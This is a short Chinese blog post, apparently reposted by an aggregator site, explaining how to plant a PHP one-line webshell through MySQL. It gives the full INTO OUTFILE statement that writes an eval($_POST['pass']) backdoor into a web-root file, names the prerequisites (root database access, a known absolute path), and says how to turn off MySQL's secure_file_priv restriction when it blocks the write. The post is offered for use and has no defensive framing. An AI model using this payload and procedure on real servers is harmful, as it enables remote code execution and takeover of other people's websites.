通过mysql写入php一句话木马
Posted 逆水行舟,不进则退
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了通过mysql写入php一句话木马相关的知识,希望对你有一定的参考价值。
利用mysql写入一句话木马
前提:
root权限,知道了服务器的web的绝对路径
select "<?php @eval($_POST[\'pass\']);?>" INTO OUTFILE "D:\\\\WWW\\\\22.php"
如果执行成功,生成D:\\WWW\\22.php,并写入
<?php @eval($_POST[\'pass\']);?>
如果出现:
提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法
是mysql设置的权限的问题
mysql对通过文件导入导出作了限制,默认不允许
show variables like \'%secure%\';
修改my.ini
secure_auth = ON
secure_file_priv = ""
注意:
1、绝对路径的猜解
2、INTO OUTFILE 后面的"D:\\\\WWW\\\\22.php"(对反斜杠做了一次转义)
以上是关于通过mysql写入php一句话木马的主要内容,如果未能解决你的问题,请参考以下文章